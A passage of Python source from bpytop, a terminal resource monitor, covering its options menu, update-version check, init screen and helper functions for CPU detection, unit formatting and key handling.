'too much for a comfortable experience.'],
"show_battery" : [
'Show battery stats.',
'',
'Show battery stats in the top right corner',
'if a battery is present.'],
"show_init" : [
'Show init screen at startup.',
'',
'The init screen is purely cosmetic and',
'slows down start to show status messages.'],
"update_check" : [
'Check for updates at start.',
'',
'Checks for latest version from:',
'https://github.com/aristocratos/bpytop'],
"log_level" : [
'Set loglevel for error.log',
'',
'Levels are: "ERROR" "WARNING" "INFO" "DEBUG".',
'The level set includes all lower levels,',
'i.e. "DEBUG" will show all logging info.']
},
"cpu" : {
"check_temp" : [
'Enable cpu temperature reporting.',
'',
'True or False.'],
"cpu_sensor" : [
'Cpu temperature sensor',
'',
'Select the sensor that corresponds to',
'your cpu temperature.',
'Set to "Auto" for auto detection.'],
"show_coretemp" : [
'Show temperatures for cpu cores.',
'',
'Only works if check_temp is True and',
'the system is reporting core temps.'],
"custom_cpu_name" : [
'Custom cpu model name in cpu percentage box.',
'',
'Empty string to disable.'],
},
"mem" : {
"mem_graphs" : [
'Show graphs for memory values.',
'',
'True or False.'],
"show_disks" : [
'Split memory box to also show disks.',
'',
'True or False.'],
"show_swap" : [
'If swap memory should be shown in memory box.',
'',
'True or False.'],
"swap_disk" : [
'Show swap as a disk.',
'',
'Ignores show_swap value above.',
'Inserts itself after first disk.'],
"only_physical" : [
'Filter out non physical disks.',
'',
'Set this to False to include network disks,',
'RAM disks and similar.',
'',
'True or False.'],
"use_fstab" : [
'Read disks list from /etc/fstab.',
'(Has no effect on macOS)',
'',
'This also disables only_physical.',
'',
'True or False.'],
"disks_filter" : [
'Optional filter for shown disks.',
'',
'Should be full path of a mountpoint,',
'"root" replaces "/", separate multiple values',
'with a comma ",".',
'Begin line with "exclude=" to change to exclude',
'filter.',
'Otherwise defaults to "most include" filter.',
'',
'Example: disks_filter="exclude=/boot, /home/user"'],
},
"net" : {
"net_download" : [
'Fixed network graph download value.',
'',
'Default "10M" = 10 MebiBytes.',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'i.e. "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_upload" : [
'Fixed network graph upload value.',
'',
'Default "10M" = 10 MebiBytes.',
'Possible units:',
'"K" (KiB), "M" (MiB), "G" (GiB).',
'',
'Append "bit" for bits instead of bytes,',
'i.e. "100Mbit"',
'',
'Can be toggled with auto button.'],
"net_auto" : [
'Start in network graphs auto rescaling mode.',
'',
'Ignores any values set above at start and',
'rescales down to 10 KibiBytes at the lowest.',
'',
'True or False.'],
"net_sync" : [
'Network scale sync.',
'',
'Syncs the scaling for download and upload to',
'whichever currently has the highest scale.',
'',
'True or False.'],
"net_color_fixed" : [
'Set network graphs color gradient to fixed.',
'',
'If True the network graphs color is based',
'on the total bandwidth usage instead of',
'the current autoscaling.',
'',
'The bandwidth usage is based on the',
'"net_download" and "net_upload" values set',
'above.'],
"net_iface" : [
'Network Interface.',
'',
'Manually set the starting Network Interface.',
'Will otherwise automatically choose the NIC',
'with the highest total download since boot.'],
},
"proc" : {
"proc_update_mult" : [
'Processes update multiplier.',
'Sets how often the process list is updated as',
'a multiplier of "update_ms".',
'',
'Set to 2 or higher to greatly decrease bpytop',
'cpu usage. (Only integers)'],
"proc_sorting" : [
'Processes sorting option.',
'',
'Possible values: "pid", "program", "arguments",',
'"threads", "user", "memory", "cpu lazy" and',
'"cpu responsive".',
'',
'"cpu lazy" updates top process over time,',
'"cpu responsive" updates top process directly.'],
"proc_reversed" : [
'Reverse processes sorting order.',
'',
'True or False.'],
"proc_tree" : [
'Processes tree view.',
'',
'Set true to show processes grouped by parents,',
'with lines drawn between parent and child',
'process.'],
"tree_depth" : [
'Process tree auto collapse depth.',
'',
'Sets the depth where the tree view will auto',
'collapse processes at.'],
"proc_colors" : [
'Enable colors in process view.',
'',
'Uses the cpu graph gradient colors.'],
"proc_gradient" : [
'Enable process view gradient fade.',
'',
'Fades from top or current selection.',
'Max fade value is equal to the current theme\'s',
'"inactive_fg" color value.'],
"proc_per_core" : [
'Process usage per core.',
'',
'If process cpu usage should be of the core',
'it\'s running on or usage of the total',
'available cpu power.',
'',
'If true and process is multithreaded',
'cpu usage can reach over 100%.'],
"proc_mem_bytes" : [
'Show memory as bytes in process list.',
' ',
'True or False.'],
}
}
sorting_i: int = CONFIG.sorting_options.index(CONFIG.proc_sorting)
loglevel_i: int = CONFIG.log_levels.index(CONFIG.log_level)
cpu_sensor_i: int = CONFIG.cpu_sensors.index(CONFIG.cpu_sensor)
color_i: int
cat_list = list(categories)
while not cls.close:
key = ""
if cls.resized or change_cat:
cls.resized = change_cat = False
selected_cat = list(categories)[cat_int]
option_items = categories[cat_list[cat_int]]
option_len: int = len(option_items) * 2
y = 12 if Term.height < option_len + 13 else Term.height // 2 - option_len // 2 + 7
out_misc = (f'{Banner.draw(y-10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
x = Term.width//2-38
x2 = x + 27
h, w, w2 = min(Term.height-1-y, option_len), 26, 50
h -= h % 2
color_i = list(Theme.themes).index(THEME.current)
out_misc += create_box(x, y - 3, w+w2+1, 3, f'tab{Symbol.right}', line_color=THEME.div_line)
out_misc += create_box(x, y, w, h+2, "options", line_color=THEME.div_line)
redraw = True
cat_width = floor((w+w2) / len(categories))
out_misc += f'{Fx.b}'
for cx, cat in enumerate(categories):
out_misc += f'{Mv.to(y-2, x + 1 + (cat_width * cx) + round(cat_width / 2 - len(cat) / 2 ))}'
if cat == selected_cat:
out_misc += f'{THEME.hi_fg}[{THEME.title}{Fx.u}{cat}{Fx.uu}{THEME.hi_fg}]'
else:
out_misc += f'{THEME.hi_fg}{SUPERSCRIPT[cx+1]}{THEME.title}{cat}'
out_misc += f'{Fx.ub}'
if option_len > h:
pages = ceil(option_len / h)
else:
h = option_len
pages = 0
page = pages if selected_int == -1 and pages > 0 else 1
selected_int = 0 if selected_int >= 0 else len(option_items) - 1
if redraw:
out = ""
cy = 0
selected = list(option_items)[selected_int]
if pages:
out += (f'{Mv.to(y+h+1, x+11)}{THEME.div_line(Symbol.title_left)}{Fx.b}{THEME.title("pg")}{Fx.ub}{THEME.main_fg(Symbol.up)} {Fx.b}{THEME.title}{page}/{pages} '
f'pg{Fx.ub}{THEME.main_fg(Symbol.down)}{THEME.div_line(Symbol.title_right)}')
#out += f'{Mv.to(y+1, x+1)}{THEME.title}{Fx.b}{"Keys:":^20}Description:{THEME.main_fg}'
for n, opt in enumerate(option_items):
if pages and n < (page - 1) * ceil(h / 2): continue
value = getattr(CONFIG, opt)
t_color = f'{THEME.selected_bg}{THEME.selected_fg}' if opt == selected else f'{THEME.title}'
v_color = "" if opt == selected else f'{THEME.title}'
d_quote = '"' if isinstance(value, str) else ""
if opt == "color_theme":
counter = f' {color_i + 1}/{len(Theme.themes)}'
elif opt == "proc_sorting":
counter = f' {sorting_i + 1}/{len(CONFIG.sorting_options)}'
elif opt == "log_level":
counter = f' {loglevel_i + 1}/{len(CONFIG.log_levels)}'
elif opt == "cpu_sensor":
counter = f' {cpu_sensor_i + 1}/{len(CONFIG.cpu_sensors)}'
else:
counter = ""
out += f'{Mv.to(y+1+cy, x+1)}{t_color}{Fx.b}{opt.replace("_", " ").capitalize() + counter:^24.24}{Fx.ub}{Mv.to(y+2+cy, x+1)}{v_color}'
if opt == selected:
if isinstance(value, bool) or opt in ["color_theme", "proc_sorting", "log_level", "cpu_sensor"]:
out += f'{t_color} {Symbol.left}{v_color}{d_quote + str(value) + d_quote:^20.20}{t_color}{Symbol.right} '
elif inputting:
out += f'{str(input_val)[-17:] + Fx.bl + "█" + Fx.ubl + "" + Symbol.enter:^33.33}'
else:
out += ((f'{t_color} {Symbol.left}{v_color}' if type(value) is int else " ") +
f'{str(value) + " " + Symbol.enter:^20.20}' + (f'{t_color}{Symbol.right} ' if type(value) is int else " "))
else:
out += f'{d_quote + str(value) + d_quote:^24.24}'
out += f'{Term.bg}'
if opt == selected:
h2 = len(option_items[opt]) + 2
y2 = y + (selected_int * 2) - ((page-1) * h)
if y2 + h2 > Term.height: y2 = Term.height - h2
out += f'{create_box(x2, y2, w2, h2, "description", line_color=THEME.div_line)}{THEME.main_fg}'
for n, desc in enumerate(option_items[opt]):
out += f'{Mv.to(y2+1+n, x2+2)}{desc:.48}'
cy += 2
if cy >= h: break
if cy < h:
for i in range(h-cy):
out += f'{Mv.to(y+1+cy+i, x+1)}{" " * (w-2)}'
if not skip or redraw:
Draw.now(f'{cls.background}{out_misc}{out}')
skip = redraw = False
if Key.input_wait(Timer.left()):
key = Key.get()
redraw = True
has_sel = False
if key == "mouse_click" and not inputting:
mx, my = Key.get_mouse()
if x < mx < x + w + w2 and y - 4 < my < y:
# if my == y - 2:
for cx, cat in enumerate(categories):
ccx = x + (cat_width * cx) + round(cat_width / 2 - len(cat) / 2 )
if ccx - 2 < mx < ccx + 2 + len(cat):
key = str(cx+1)
elif x < mx < x + w and y < my < y + h + 2:
mouse_sel = ceil((my - y) / 2) - 1 + ceil((page-1) * (h / 2))
if pages and my == y+h+1 and x+11 < mx < x+16:
key = "page_up"
elif pages and my == y+h+1 and x+19 < mx < x+24:
key = "page_down"
elif my == y+h+1:
pass
elif mouse_sel == selected_int:
if mx < x + 6:
key = "left"
elif mx > x + 19:
key = "right"
else:
key = "enter"
elif mouse_sel < len(option_items):
selected_int = mouse_sel
has_sel = True
else:
key = "escape"
if inputting:
if key in ["escape", "mouse_click"]:
inputting = False
elif key == "enter":
inputting = False
if str(getattr(CONFIG, selected)) != input_val:
if selected == "update_ms":
if not input_val or int(input_val) < 100:
CONFIG.update_ms = 100
elif int(input_val) > 86399900:
CONFIG.update_ms = 86399900
else:
CONFIG.update_ms = int(input_val)
elif selected == "proc_update_mult":
if not input_val or int(input_val) < 1:
CONFIG.proc_update_mult = 1
else:
CONFIG.proc_update_mult = int(input_val)
Collector.proc_counter = 1
elif selected == "tree_depth":
if not input_val or int(input_val) < 0:
CONFIG.tree_depth = 0
else:
CONFIG.tree_depth = int(input_val)
ProcCollector.collapsed = {}
elif selected == "shown_boxes":
new_boxes: List = []
for box in input_val.split():
if box in ["cpu", "mem", "net", "proc"]:
new_boxes.append(box)
CONFIG.shown_boxes = " ".join(new_boxes)
Box.view_mode = "user"
Box.view_modes["user"] = CONFIG.shown_boxes.split()
Draw.clear(saved=True)
elif isinstance(getattr(CONFIG, selected), str):
setattr(CONFIG, selected, input_val)
if selected.startswith("net_"):
NetCollector.net_min = {"download" : -1, "upload" : -1}
elif selected == "draw_clock":
Box.clock_on = len(CONFIG.draw_clock) > 0
if not Box.clock_on: Draw.clear("clock", saved=True)
Term.refresh(force=True)
cls.resized = False
elif key == "backspace" and len(input_val):
input_val = input_val[:-1]
elif key == "delete":
input_val = ""
elif isinstance(getattr(CONFIG, selected), str) and len(key) == 1:
input_val += key
elif isinstance(getattr(CONFIG, selected), int) and key.isdigit():
input_val += key
elif key == "q":
clean_quit()
elif key in ["escape", "o", "M", "f2"]:
cls.close = True
break
elif key == "tab" or (key == "down" and selected_int == len(option_items) - 1 and (page == pages or pages == 0)):
if cat_int == len(categories) - 1:
cat_int = 0
else:
cat_int += 1
change_cat = True
elif key == "shift_tab" or (key == "up" and selected_int == 0 and page == 1):
if cat_int == 0:
cat_int = len(categories) - 1
else:
cat_int -= 1
change_cat = True
selected_int = -1 if key != "shift_tab" else 0
elif key in list(map(str, range(1, len(cat_list)+1))) and key != str(cat_int + 1):
cat_int = int(key) - 1
change_cat = True
elif key == "enter" and selected in ["update_ms", "disks_filter", "custom_cpu_name", "net_download",
"net_upload", "draw_clock", "tree_depth", "proc_update_mult", "shown_boxes", "net_iface"]:
inputting = True
input_val = str(getattr(CONFIG, selected))
elif key == "left" and selected == "update_ms" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key == "right" and selected == "update_ms" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "left" and selected == "proc_update_mult" and CONFIG.proc_update_mult > 1:
CONFIG.proc_update_mult -= 1
Collector.proc_counter = 1
elif key == "right" and selected == "proc_update_mult":
CONFIG.proc_update_mult += 1
Collector.proc_counter = 1
elif key == "left" and selected == "tree_depth" and CONFIG.tree_depth > 0:
CONFIG.tree_depth -= 1
ProcCollector.collapsed = {}
elif key == "right" and selected == "tree_depth":
CONFIG.tree_depth += 1
ProcCollector.collapsed = {}
elif key in ["left", "right"] and isinstance(getattr(CONFIG, selected), bool):
setattr(CONFIG, selected, not getattr(CONFIG, selected))
if selected == "check_temp":
if CONFIG.check_temp:
CpuCollector.get_sensors()
else:
CpuCollector.sensor_method = ""
CpuCollector.got_sensors = False
if selected in ["net_auto", "net_color_fixed", "net_sync"]:
if selected == "net_auto": NetCollector.auto_min = CONFIG.net_auto
NetBox.redraw = True
if selected == "theme_background":
Term.bg = f'{THEME.main_bg}' if CONFIG.theme_background else "\033[49m"
Draw.now(Term.bg)
if selected == "show_battery":
Draw.clear("battery", saved=True)
Term.refresh(force=True)
cls.resized = False
elif key in ["left", "right"] and selected == "color_theme" and len(Theme.themes) > 1:
if key == "left":
color_i -= 1
if color_i < 0: color_i = len(Theme.themes) - 1
elif key == "right":
color_i += 1
if color_i > len(Theme.themes) - 1: color_i = 0
Collector.collect_idle.wait()
CONFIG.color_theme = list(Theme.themes)[color_i]
THEME(CONFIG.color_theme)
Term.refresh(force=True)
Timer.finish()
elif key in ["left", "right"] and selected == "proc_sorting":
ProcCollector.sorting(key)
elif key in ["left", "right"] and selected == "log_level":
if key == "left":
loglevel_i -= 1
if loglevel_i < 0: loglevel_i = len(CONFIG.log_levels) - 1
elif key == "right":
loglevel_i += 1
if loglevel_i > len(CONFIG.log_levels) - 1: loglevel_i = 0
CONFIG.log_level = CONFIG.log_levels[loglevel_i]
errlog.setLevel(getattr(logging, CONFIG.log_level))
errlog.info(f'Loglevel set to {CONFIG.log_level}')
elif key in ["left", "right"] and selected == "cpu_sensor" and len(CONFIG.cpu_sensors) > 1:
if key == "left":
cpu_sensor_i -= 1
if cpu_sensor_i < 0: cpu_sensor_i = len(CONFIG.cpu_sensors) - 1
elif key == "right":
cpu_sensor_i += 1
if cpu_sensor_i > len(CONFIG.cpu_sensors) - 1: cpu_sensor_i = 0
Collector.collect_idle.wait()
CpuCollector.sensor_swap = True
CONFIG.cpu_sensor = CONFIG.cpu_sensors[cpu_sensor_i]
if CONFIG.check_temp and (CpuCollector.sensor_method != "psutil" or CONFIG.cpu_sensor == "Auto"):
CpuCollector.get_sensors()
Term.refresh(force=True)
cls.resized = False
elif key in ["up", "mouse_scroll_up"]:
selected_int -= 1
if selected_int < 0: selected_int = len(option_items) - 1
page = floor(selected_int * 2 / h) + 1
elif key in ["down", "mouse_scroll_down"]:
selected_int += 1
if selected_int > len(option_items) - 1: selected_int = 0
page = floor(selected_int * 2 / h) + 1
elif key == "page_up":
if not pages or page == 1:
selected_int = 0
else:
page -= 1
if page < 1: page = pages
selected_int = (page-1) * ceil(h / 2)
elif key == "page_down":
if not pages or page == pages:
selected_int = len(option_items) - 1
else:
page += 1
if page > pages: page = 1
selected_int = (page-1) * ceil(h / 2)
elif has_sel:
pass
else:
redraw = False
if Timer.not_zero() and not cls.resized:
skip = True
else:
Collector.collect()
Collector.collect_done.wait(2)
if CONFIG.background_update: cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
Timer.stamp()
if main_active:
cls.close = False
return
Draw.now(f'{Draw.saved_buffer()}')
cls.background = ""
cls.active = False
cls.close = False
class Timer:
timestamp: float
return_zero = False
@classmethod
def stamp(cls):
cls.timestamp = time()
@classmethod
def not_zero(cls) -> bool:
if cls.return_zero:
cls.return_zero = False
return False
return cls.timestamp + (CONFIG.update_ms / 1000) > time()
@classmethod
def left(cls) -> float:
return cls.timestamp + (CONFIG.update_ms / 1000) - time()
@classmethod
def finish(cls):
cls.return_zero = True
cls.timestamp = time() - (CONFIG.update_ms / 1000)
Key.break_wait()
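# Note added for clarity (not part of the original bpytop source): Timer paces the
# main loop. stamp() marks the start of an update cycle, left() returns the seconds
# remaining of CONFIG.update_ms, not_zero() is the loop condition, and finish()
# back-dates the stamp and wakes the key reader via Key.break_wait() so the next
# collection runs immediately (used e.g. after a theme change in the options menu).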
class UpdateChecker:
version: str = VERSION
thread: threading.Thread
@classmethod
def run(cls):
cls.thread = threading.Thread(target=cls._checker)
cls.thread.start()
@classmethod
def _checker(cls):
try:
with urllib.request.urlopen("https://github.com/aristocratos/bpytop/raw/master/bpytop.py", timeout=5) as source: # type: ignore
for line in source:
line = line.decode("utf-8")
if line.startswith("VERSION: str ="):
cls.version = line[(line.index("=")+1):].strip('" \n')
break
except Exception as e:
errlog.exception(f'{e}')
else:
if cls.version != VERSION and which("notify-send"):
try:
subprocess.run(["notify-send", "-u", "normal", "BpyTop Update!",
f'New version of BpyTop available!\nCurrent version: {VERSION}\nNew version: {cls.version}\nDownload at github.com/aristocratos/bpytop',
"-i", "update-notifier", "-t", "10000"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
except Exception as e:
errlog.exception(f'{e}')
class Init:
running: bool = True
initbg_colors: List[str] = []
initbg_data: List[int]
initbg_up: Graph
initbg_down: Graph
resized = False
@classmethod
def start(cls):
Draw.buffer("init", z=1)
Draw.buffer("initbg", z=10)
for i in range(51):
for _ in range(2): cls.initbg_colors.append(Color.fg(i, i, i))
Draw.buffer("banner", (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(11)}{Colors.black_bg}{Colors.default}'
f'{Fx.b}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}{Color.fg("#50")}'), z=2)
for _i in range(7):
perc = f'{str(round((_i + 1) * 14 + 2)) + "%":>5}'
Draw.buffer("+banner", f'{Mv.to(Term.height // 2 - 2 + _i, Term.width // 2 - 28)}{Fx.trans(perc)}{Symbol.v_line}')
Draw.out("banner")
Draw.buffer("+init!", f'{Color.fg("#cc")}{Fx.b}{Mv.to(Term.height // 2 - 2, Term.width // 2 - 21)}{Mv.save}')
cls.initbg_data = [randint(0, 100) for _ in range(Term.width * 2)]
cls.initbg_up = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=True)
cls.initbg_down = Graph(Term.width, Term.height // 2, cls.initbg_colors, cls.initbg_data, invert=False)
@classmethod
def success(cls):
if not CONFIG.show_init or cls.resized: return
cls.draw_bg(5)
Draw.buffer("+init!", f'{Mv.restore}{Symbol.ok}\n{Mv.r(Term.width // 2 - 22)}{Mv.save}')
@staticmethod
def fail(err):
if CONFIG.show_init:
Draw.buffer("+init!", f'{Mv.restore}{Symbol.fail}')
sleep(2)
errlog.exception(f'{err}')
clean_quit(1, errmsg=f'Error during init! See {CONFIG_DIR}/error.log for more information.')
@classmethod
def draw_bg(cls, times: int = 5):
for _ in range(times):
sleep(0.05)
x = randint(0, 100)
Draw.buffer("initbg", f'{Fx.ub}{Mv.to(0, 0)}{cls.initbg_up(x)}{Mv.to(Term.height // 2, 0)}{cls.initbg_down(x)}')
Draw.out("initbg", "banner", "init")
@classmethod
def done(cls):
cls.running = False
if not CONFIG.show_init: return
if cls.resized:
Draw.now(Term.clear)
else:
cls.draw_bg(10)
Draw.clear("initbg", "banner", "init", saved=True)
if cls.resized: return
del cls.initbg_up, cls.initbg_down, cls.initbg_data, cls.initbg_colors
#? Functions ------------------------------------------------------------------------------------->
def get_cpu_name() -> str:
'''Fetch a suitable CPU identifier from the CPU model name string'''
name: str = ""
nlist: List = []
command: str = ""
cmd_out: str = ""
rem_line: str = ""
if SYSTEM == "Linux":
command = "cat /proc/cpuinfo"
rem_line = "model name"
elif SYSTEM == "MacOS":
command = "sysctl -n machdep.cpu.brand_string"
elif SYSTEM == "BSD":
command = "sysctl hw.model"
rem_line = "hw.model"
try:
cmd_out = subprocess.check_output("LANG=C " + command, shell=True, universal_newlines=True)
except:
pass
if rem_line:
for line in cmd_out.split("\n"):
if rem_line in line:
name = re.sub( ".*" + rem_line + ".*:", "", line,1).lstrip()
else:
name = cmd_out
nlist = name.split(" ")
try:
if "Xeon" in name and "CPU" in name:
name = nlist[nlist.index("CPU")+(-1 if name.endswith(("CPU", "z")) else 1)]
elif "Ryzen" in name:
name = " ".join(nlist[nlist.index("Ryzen"):nlist.index("Ryzen")+3])
elif "Duo" in name and "@" in name:
name = " ".join(nlist[:nlist.index("@")])
elif "CPU" in name and not nlist[0] == "CPU" and not nlist[nlist.index("CPU")-1].isdigit():
name = nlist[nlist.index("CPU")-1]
except:
pass
name = name.replace("Processor", "").replace("CPU", "").replace("(R)", "").replace("(TM)", "").replace("Intel", "")
name = re.sub(r"\d?\.?\d+[mMgG][hH][zZ]", "", name)
name = " ".join(name.split())
return name
def get_cpu_core_mapping() -> List[int]:
mapping: List[int] = []
if SYSTEM == "Linux" and os.path.isfile("/proc/cpuinfo"):
try:
mapping = [0] * THREADS
num = 0
with open("/proc/cpuinfo", "r") as f:
for line in f:
if line.startswith("processor"):
num = int(line.strip()[(line.index(": ")+2):])
if num > THREADS - 1:
break
elif line.startswith("core id"):
mapping[num] = int(line.strip()[(line.index(": ")+2):])
if num < THREADS - 1:
raise Exception
except:
mapping = []
if not mapping:
mapping = []
for _ in range(THREADS // CORES):
mapping.extend([x for x in range(CORES)])
return mapping
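# Illustrative note (not part of the original source): when /proc/cpuinfo is
# unavailable or parsing fails, the fallback above simply repeats the core indices
# once per thread group. Assuming a CPU with CORES = 4 and THREADS = 8, the
# resulting mapping would be:
#   [0, 1, 2, 3, 0, 1, 2, 3]
# i.e. hardware thread N is assumed to sit on core N % CORES.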
def create_box(x: int = 0, y: int = 0, width: int = 0, height: int = 0, title: str = "", title2: str = "", line_color: Color = None, title_color: Color = None, fill: bool = True, box = None) -> str:
'''Create a box from a box object or by given arguments'''
out: str = f'{Term.fg}{Term.bg}'
num: int = 0
if not line_color: line_color = THEME.div_line
if not title_color: title_color = THEME.title
#* Get values from box class if given
if box:
x = box.x
y = box.y
width = box.width
height = box.height
title = box.name
num = box.num
hlines: Tuple[int, int] = (y, y + height - 1)
out += f'{line_color}'
#* Draw all horizontal lines
for hpos in hlines:
out += f'{Mv.to(hpos, x)}{Symbol.h_line * (width - 1)}'
#* Draw all vertical lines and fill if enabled
for hpos in range(hlines[0]+1, hlines[1]):
out += f'{Mv.to(hpos, x)}{Symbol.v_line}{" " * (width-2) if fill else Mv.r(width-2)}{Symbol.v_line}'
#* Draw corners
out += f'{Mv.to(y, x)}{Symbol.left_up}\
{Mv.to(y, x + width - 1)}{Symbol.right_up}\
{Mv.to(y + height - 1, x)}{Symbol.left_down}\
{Mv.to(y + height - 1, x + width - 1)}{Symbol.right_down}'
#* Draw titles if enabled
if title:
numbered: str = "" if not num else f'{THEME.hi_fg(SUPERSCRIPT[num])}'
out += f'{Mv.to(y, x + 2)}{Symbol.title_left}{Fx.b}{numbered}{title_color}{title}{Fx.ub}{line_color}{Symbol.title_right}'
if title2:
out += f'{Mv.to(hlines[1], x + 2)}{Symbol.title_left}{title_color}{Fx.b}{title2}{Fx.ub}{line_color}{Symbol.title_right}'
return f'{out}{Term.fg}{Mv.to(y + 1, x + 1)}'
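# Usage sketch (added note, not in the original source; the buffer name "demo" is
# made up for illustration): create_box() only returns an ANSI string, so the
# caller draws it through Draw, e.g.
#   Draw.buffer("demo", create_box(x=1, y=1, width=30, height=10, title="demo"))
# which queues a 30x10 bordered box at the top-left corner and leaves the cursor
# just inside the border at (y+1, x+1), ready for content.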
def now_sleeping(signum, frame):
"""Reset terminal settings and stop background input read before putting to sleep"""
Key.stop()
Collector.stop()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
os.kill(os.getpid(), signal.SIGSTOP)
def now_awake(signum, frame):
"""Set terminal settings and restart background input read"""
Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
Term.echo(False)
Key.start()
Term.refresh()
Box.calc_sizes()
Box.draw_bg()
Collector.start()
def quit_sigint(signum, frame):
"""SIGINT redirection to clean_quit()"""
clean_quit()
def clean_quit(errcode: int = 0, errmsg: str = "", thread: bool = False):
"""Stop background input read, save current config and reset terminal settings before quitting"""
global THREAD_ERROR
if thread:
THREAD_ERROR = errcode
interrupt_main()
return
if THREAD_ERROR: errcode = THREAD_ERROR
Key.stop()
Collector.stop()
if not errcode: CONFIG.save_config()
Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
Term.echo(True)
if errcode == 0:
errlog.info(f'Exiting. Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
else:
errlog.warning(f'Exiting with errorcode ({errcode}). Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
if not errmsg: errmsg = f'Bpytop exited with errorcode ({errcode}). See {CONFIG_DIR}/error.log for more information!'
if errmsg: print(errmsg)
raise SystemExit(errcode)
def floating_humanizer(value: Union[float, int], bit: bool = False, per_second: bool = False, start: int = 0, short: bool = False) -> str:
'''Scales up in steps of 1024 to highest possible unit and returns string with unit suffixed
* bit=True for bits, otherwise defaults to bytes
* start=int to set 1024 multiplier starting unit
* short=True always returns 0 decimals and shortens unit to 1 character
'''
out: str = ""
mult: int = 8 if bit else 1
selector: int = start
unit: Tuple[str, ...] = UNITS["bit"] if bit else UNITS["byte"]
if isinstance(value, float): value = round(value * 100 * mult)
elif value > 0: value *= 100 * mult
else: value = 0
while len(f'{value}') > 5 and value >= 102400:
value >>= 10
if value < 100:
out = f'{value}'
break
selector += 1
else:
if len(f'{value}') == 4 and selector > 0:
out = f'{value}'[:-2] + "." + f'{value}'[-2]
elif len(f'{value}') == 3 and selector > 0:
out = f'{value}'[:-2] + "." + f'{value}'[-2:]
elif len(f'{value}') >= 2:
out = f'{value}'[:-2]
else:
out = f'{value}'
if short:
if "." in out:
out = f'{round(float(out))}'
if len(out) > 3:
out = f'{int(out[0]) + 1}'
selector += 1
out += f'{"" if short else " "}{unit[selector][0] if short else unit[selector]}'
if per_second: out += "ps" if bit else "/s"
return out
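# Worked examples (added note, not in the original source; the exact suffixes come
# from the UNITS table defined earlier, assumed here to be ("Byte", "KiB", "MiB", ...)):
#   floating_humanizer(1)       -> "1 Byte"   (1 * 100 = 100, no 10-bit shift)
#   floating_humanizer(1024)    -> "1.00 KiB" (102400 >> 10 = 100, one shift)
#   floating_humanizer(1 << 20) -> "1.00 MiB" (two shifts of 10 bits)
# The value is pre-multiplied by 100 so two "decimal" digits survive the integer
# right-shifts, and the number of shifts selects the unit suffix.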
def units_to_bytes(value: str) -> int:
if not value: return 0
out: int = 0
mult: int = 0
bit: bool = False
value_i: int = 0
units: Dict[str, int] = {"k" : 1, "m" : 2, "g" : 3}
try:
if value.lower().endswith("s"):
value = value[:-1]
if value.lower().endswith("bit"):
bit = True
value = value[:-3]
elif value.lower().endswith("byte"):
value = value[:-4]
if value[-1].lower() in units:
mult = units[value[-1].lower()]
value = value[:-1]
if "." in value and value.replace(".", "").isdigit():
if mult > 0:
value_i = round(float(value) * 1024)
mult -= 1
else:
value_i = round(float(value))
elif value.isdigit():
value_i = int(value)
out = int(value_i) << (10 * mult)
if bit: out = round(out / 8)
except ValueError:
out = 0
return out
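# Worked examples (added note, not in the original source):
#   units_to_bytes("10M")     -> 10 << 20               = 10485760
#   units_to_bytes("100Mbit") -> round((100 << 20) / 8) = 13107200
#   units_to_bytes("1.5K")    -> round(1.5 * 1024)      = 1536
# This is the inverse direction of floating_humanizer() above: the unit letter sets
# the number of 1024 steps, a "bit" suffix divides by 8, fractions consume one step.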
def min_max(value: int, min_value: int=0, max_value: int=100) -> int:
return max(min_value, min(value, max_value))
def readfile(file: str, default: str = "") -> str:
out: Union[str, None] = None
if os.path.isfile(file):
try:
with open(file, "r") as f:
out = f.read().strip()
except:
pass
return default if out is None else out
def process_keys():
mouse_pos: Tuple[int, int] = (0, 0)
filtered: bool = False
box_keys = {"1" : "cpu", "2" : "mem", "3" : "net", "4" : "proc"}
while Key.has_key():
key = Key.get()
found: bool = True
if key in ["mouse_scroll_up", "mouse_scroll_down", "mouse_click"]:
mouse_pos = Key.get_mouse()
if mouse_pos[0] >= ProcBox.x and ProcBox.current_y + 1 <= mouse_pos[1] < ProcBox.current_y + ProcBox.current_h - 1:
pass
elif key == "mouse_click":
key = "mouse_unselect"
else:
key = "_null"
if ProcBox.filtering:
if key in ["enter", "mouse_click", "mouse_unselect"]:
ProcBox.filtering = False
Collector.collect(ProcCollector, redraw=True, only_draw=True)
continue
elif key in ["escape", "delete"]:
ProcCollector.search_filter = ""
ProcBox.filtering = False
elif len(key) == 1:
ProcCollector.search_filter += key
elif key == "backspace" and len(ProcCollector.search_filter) > 0:
ProcCollector.search_filter = ProcCollector.search_filter[:-1]
else:
continue
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
if filtered: Collector.collect_done.wait(0.1)
filtered = True
continue
if key == "_null":
continue
elif key == "q":
clean_quit()
elif key == "+" and CONFIG.update_ms + 100 <= 86399900:
CONFIG.update_ms += 100
Box.draw_update_ms()
elif key == "-" and CONFIG.update_ms - 100 >= 100:
CONFIG.update_ms -= 100
Box.draw_update_ms()
elif key in ["M", "escape"]:
Menu.main()
elif key in ["o", "f2"]:
Menu.options()
elif key in ["h", "f1"]:
Menu.help()
elif key == "m":
